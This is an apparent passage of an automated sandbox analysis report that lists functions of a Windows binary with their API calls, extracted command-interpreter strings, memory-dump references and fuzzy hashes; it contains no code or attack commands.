                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                          • String ID:
                                                                                          • API String ID: 1034426908-0
                                                                                          • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                          • Instruction ID: 2c83b55237c779a99e1d0732320776a39781864c7c35da457077c81467b1ce50
                                                                                          • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                          • Instruction Fuzzy Hash: EFF1BE32B0A783AAEB64CF21D8402E967A4FF45788F444135DA5E8BB96DF3CE544E700
                                                                                          Function 00007FF6A0E9AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AA85
                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AACF
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AAEC
                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB39
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB6F
                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABA4
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABCB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                          • String ID: %s=%s
                                                                                          • API String ID: 1019019434-1087296587
                                                                                          • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                          • Instruction ID: 160f205e95fdf698a8f2a8e1524f4e0e357153422cbb8617eea0da59251cdc91
                                                                                          • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                          • Instruction Fuzzy Hash: AE51D332B0A783A6E7608B25E4407BABAE1FF89780F548234DE4DC3795EF38D4559B00
                                                                                          Function 00007FF6A0E74A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4289998964-0
                                                                                          • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                          • Instruction ID: 31996360922461fed1ffc5e96bf9fd73a9729b9739caa87b56dc7ec1a9c6bab7
                                                                                          • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                          • Instruction Fuzzy Hash: 7BC1B171B0B35BA2EE949B529548779A3A0FB45BD0F005539CE0E87BD1EF3CE891A340
                                                                                          Function 00007FF6A0E73D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                          • String ID: %9d
                                                                                          • API String ID: 1006866328-2241623522
                                                                                          • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                          • Instruction ID: 584314e8e6697c1001848f46849e834c573d0aa5fcb5bb617292585b91cd71d2
                                                                                          • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                          • Instruction Fuzzy Hash: 06516272A0A743AAE740CF21E8406A97BB4FB45794F408635DA2DD37A6DF3CE544EB40
                                                                                          Function 00007FF6A0E78DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                          • Instruction ID: 5d99bb03fa24f23f1c3eb004f67337d4875a5d925f797104a76df9fe28371f9c
                                                                                          • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                          • Instruction Fuzzy Hash: 34C1F132F0A787A6EB64CB20E990AB963A4FF95784F044135DA1D877A2DF3CE555A300
                                                                                          Function 00007FF6A0E7B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7BA2B
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BA8A
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BAAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                          • API String ID: 2872855111-969133440
                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction ID: 0c5c964d48b15df265e6e80df794b71225244cbdc0c6a0c6b7949b69ec4c697d
                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction Fuzzy Hash: 8CB19132A0EA83A1EA709B15A48437966A0FF89B80F954235DE5EC3795DF3CE845A300
                                                                                          Function 00007FF6A0E8662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E86677
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E8668F
                                                                                          • _errno.MSVCRT ref: 00007FF6A0E866A3
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E866C4
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866E4
                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                          • API String ID: 2348642995-441775793
                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction ID: d18f7c49df57238008a06f6855a3e652e31171f370983c6ac220e12c435cea87
                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction Fuzzy Hash: 47717A72D0AA87A6E7605F21D45017DB7A0FB89F89F54C032DA4E86394EF3DE488E750
                                                                                          Function 00007FF6A0E78B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1944892715-0
                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction ID: f27df09f70129af64119d30d6957277af660f08c295208c84af130852cdf283d
                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction Fuzzy Hash: E2B1A171A0B783A6EB609F11A954179B6A1FF69B81F548435CA4EC73D2EF3CE444E310
                                                                                          Function 00007FF6A0E986FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                          • String ID: %s$/-.$:
                                                                                          • API String ID: 1644023181-879152773
                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction ID: c90b77946093ed0a62fd9608ecb1794cd83d947e291c71511e8aea78889d9121
                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction Fuzzy Hash: 9A91C332A0A683A5EB649B64D5402BEA3A0FF84BC4F944536DA4EC37E5DF3CE545E310
                                                                                          Function 00007FF6A0E9CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                          • String ID: $Application$System
                                                                                          • API String ID: 3377411628-1881496484
                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction ID: 2a4dc7fac50ed1507ca2ed8cef443dd77f3d9b12d046da0ded3557cb51d3352c
                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction Fuzzy Hash: 11414872B09B42AAE7209B60E4403ED77B5FB89749F545136EA4E83B98EF3CD145C740
                                                                                          Function 00007FF6A0E8258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825CA
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825E8
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E8260F
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82636
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82650
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                          • API String ID: 3407644289-1668778490
                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction ID: 63e158f1a6b2e493dea714cb79fbdd183697de8c80dabeb9cf08d5df6d504552
                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction Fuzzy Hash: 0F313071A1E603A6F7105F21E8113796AA5BF99B81F548439DA0EC63E5EF3CE408F711
                                                                                          Function 00007FF6A0E9A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                          • String ID: PE
                                                                                          • API String ID: 2941894976-4258593460
                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction ID: 658ba53696c449f393504f4727f5440a95b31446592d24778806714ab9b0308b
                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction Fuzzy Hash: D9418E71609793A6EA208B11E41027AFBA0FF89BD1F484231EE9D83B95DF3CE455DB40
                                                                                          Function 00007FF6A0E99B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Enum$Openwcsrchr
                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                          • API String ID: 3402383852-1459555574
                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction ID: de9aa223e584927818a56efc5ae29e946791a1c024a65473f014f2a003b068a0
                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction Fuzzy Hash: EFA1B172A0A683A3EE109B59E4502BAE2A0FF85BD0F944531DA4E877D5EF7CED41D300
                                                                                          Function 00007FF6A0E87610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
